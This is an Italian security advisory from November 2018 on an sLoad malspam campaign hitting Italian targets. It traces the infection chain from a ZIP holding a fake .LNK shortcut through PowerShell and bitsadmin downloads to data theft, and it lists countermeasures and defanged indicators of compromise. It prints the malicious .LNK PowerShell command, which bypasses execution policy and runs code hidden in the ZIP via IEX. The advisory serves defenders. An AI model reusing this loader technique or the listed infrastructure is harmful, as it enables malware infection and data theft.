Campagna di malspam basata sullo script sLoad

27/11/2018

malspam sLoad

In base ad una ricerca degli analisti di ZLAB Yoroi-Cybaze e ancora prima da uno studio di Certego, una nuova campagna di malspam basata sullo script sLoad sta colpendo target localizzati in Italia. Lo script sLoad è stato utilizzato in passato per diffondere diversi tipi di malware, come il temuto “Ramnit banker”.

sLoad è in grado di caricare nei sistemi compromessi ulteriori binari malevoli, acquisire schermate, catturare la cache DNS, aggiornare la propria configurazione e i server C&C, leggere l’elenco dei processi in esecuzione e rilevare se è in uso Outlook.  Tutte queste informazioni vengono inviate al server C&C, ovvero dall’host controllato dall’attaccante. 

Le tecniche utilizzate presentano caratteristiche simili a precedenti campagne di malspam all’interno del panorama cibernetico italiano e condividono lo stessa tecnica di occultamento del codice all’interno di archivi compressi e modelli di drop-url, già documentate da Yoroi e dal CERT-PA nella news “Campagna malspam con Payload occultato nel file ZIP“.

Catena di infezione

Gli analisti hanno illustrato la successione di 5 script PowerShell deputati alla fase di download; ad essa segue poi la distribuzione del payload finale.

Lo scenario risulta essere sempre lo stesso: si cerca di indurre il destinatario a cliccare su un link presente nel corpo del messaggio o sull’allegato per aprire un file .zip contenente:

  1. un file .LNK (collegamento fasullo);
  2. un file immagine JPEG non malevola.

Come illustrato in figura, il processo di infezione ha inizio con il clic sul file .LNK che esegue il codice PowerShell di seguito riportato:

C: \ Windows \ System32 \ cmd.exe / C powershell.exe -nop -eP ByPass -win ciao “d” den -c “& {$ 9oc = get-childItem -path c: \ users \ * -recurse -force -include documento-aggiornato-novembre – *. zip; $ g3u = get-content -LiteralPat $ 9oc.fullname; $ g3u [$ g3u.length-1] | iex} “

Lo script Powershell cerca i file di nome “documento-aggiornato-novembre-*.zip“. Se li trova, estrae da ciascuno di essi una porzione di codice eseguibile contenuto nel file .ZIP e successivamente lo invoca attraverso la primitiva “IEX”. Questo codice funge da dropper, infatti scarica via bitsadmin.exe altri script dal dominio “firetechnicaladvisor.com” salvandoli nella cartella “%APPDATA%/<UUID>” di Windows .

L’immagine seguente mostra a titolo di esempio il contenuto della cartella con tutte le componenti scaricate:

A questo punto vengono eseguiti altri PS dei quali l’ultimo, avviato ed eseguito in memoria è il payload di sLoad.

  • Il file “NxPgKLnYEhMjXT.ps1” si installa sulla macchina della vittima, registrando un task pianificato in grado di assicurare la persistenza dell’infezione. Al termine di questo processo, lo script cancella se stesso.
  • Il file  “CxeLtfwc.ps1” è un ulteriore script che carica ed esegue un altro pezzo di codice dal file “config.ini”. Lo script viene lanciato col parametro (“1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16”), usato come chiave crittografica per decifrare il contenuto del file “config.ini”, che rappresenta il vero payload del malware.

Come ultima fase della catena, viene avviato sLoad che acquisisce periodicamente lo screenshot, raccoglie le informazioni di sistema e  invia i dati al server C&C.

Contromisure

Una soluzione sempre valida contro questa modalità di diffusione, che non è legata alle firme Antivirus, è quella di bloccare il traffico in uscita dai client per quei comandi come “cmd”, “cscript” o “powershell” che di solito sono attivati per il download di codice malevolo da internet.

Ulteriori suggerimenti, da valutare lato end-point, richiamano l’attuazione di specifiche politiche di controllo e restrizioni sulle funzionalità di Windows tra cui:

Indicatori di compromissione (fonte ZLAB Yoroi-Cybaze e CERT-PA)

  • Dropurls:
    • https://upabovenewyork[.com/.fatturazione/fattura-per-cliente-QN-OAYSAPV
    • https://sciencefictionforgirls.[com/cience/ionfo
    • upabovenewyork[.com
    • 91.218.127.[180
    • sciencefictionforgirls[.com
    • 185.17.27[.100
    • https://rootcellarproductions.[com/documento/AE-9455933DGW-nota-cliente
    • https://peatsenglishcider.[com/seng/ishci
    • rootcellarproductions[.com
    • 91.218.127.[183
    • peatsenglishcider.[com
    • 185.17.27[.100
    • https://three-bottles[.com/area-riservata/MA-47462780Y3-documento-cliente
    • https://icodeucode.[com/col/euco
    • three-bottles[.com
    • 91.218.127.[183
    • firetechnicaladvisor.[com
    • 185.17.27.[108
    • https://cavintageclothing[.com/update/b746yrthdfb.txt
    • cavintageclothing.[com
    • 185.17.27[.108
    • bureaucratica[.org
    • 18.13.7[.20
  • C2 (sload):
    • https://balkher.[eu/doc/p2.txt
    • https://balkher.[eu/sload/2.0/hostp1.txt
    • https://balkher[.eu/sload//img.php?ch=1
    • balkher[.eu
    • 185.197.75[.241
    • https://perecwarrio[.eu/sload/
    • perecwarrior[.eu
    • 185.211.246[.50
    • https://ljfumm[.me/images/gate.php
    • https://hamofgri.[me/images/gate.php
    • https://hamofgri.[me/images/captcha.php?ch=1
    • https://ljfumm[.me/images/captcha.php?ch=1
    • ljfumm[.me
    • hamofgri[.me
    • 185.197.75[.10
  • Persistency:
    • %APPDATA%\<GUID>
  • Hash:
    • b702e8e23165273f8e90615ce4af2f158048bf6b615f545b992fbbb62f7eff27 zip
    • 1cbe16ac066aeac78c2f3e41e2afa3433833bf6f65131bcfbf88db97e9b94efb jpg
    • d8f4ae0477f7e2931e89e4b6d3e78556d3b5765a2c08bc3bdec8c1f6dc0904c0 lnk
    • ed1007884730a664f9cc827fb60924079149a2fec08ca91c2342c368e727c330 zip
    • 3b5b6cd6ecef252624ee3b5c80d27647766527920b76ebc533f9bc336bfe91ad jpg
    • 0a392ded18578069c647383492253f990210b9c9f9293a6ded09eab7e0936562 jpg
    • b19794f283f9c09f997cbfcbec8c30a5e48eb520ee7bcabd0d62c7b527105f42 lnk
    • 3866a58fe3d459173a28bfdee3ec7a90d7551761121fba9eda3685a268cdeda5  ps1
    • ed99528a9e818fb486e468d9744745fcfd7157cc8e18181dce7404483c12e834 zip
    • 97f9bb29083458c88844a2cecca272a22cac8cf7960b76c3fa46e891eeb18236 lnk
    • 444e29050bbe68484e33f4e30dbe165186f93884e3336643cfb965156141c5ae jpg
    • 6a49ed883ed266682ec275a395e0d7c6489ded6a6d7072e84af696e82f3b49a3 ps1
    • f94ebce29158af5f4df34e5af428a514faeef20de08418ad0153ad2a9a07cea0 ps1
    • daadae8672c31474047f21008ec131cf6a102dac7ca8b8c6df89d35bdf2246da vbs
    • ee1dbf76665f5c07ba1c453d1890aa93307f759c5cce6f59f225111509482a64 ps1
    • 062cc76eeb34d1d3bb5467836cd2d33cb973fc0a8129947af074675beb1fbf1f ini
    • df1cb74942fe9d0897431752c2d9717190aa38f79834e22aa885ec8881134505

Di seguito gli IoC  in formato testuale scaricabile:

  • IoC (.txt) – File globale : Domini, Urls, hash files (SHA1, MD5 e SHA256), IPv4
  • IoC (HASHr.txt) – Lista dei soli hash file da utilizzare in combinazione con il tool HASHr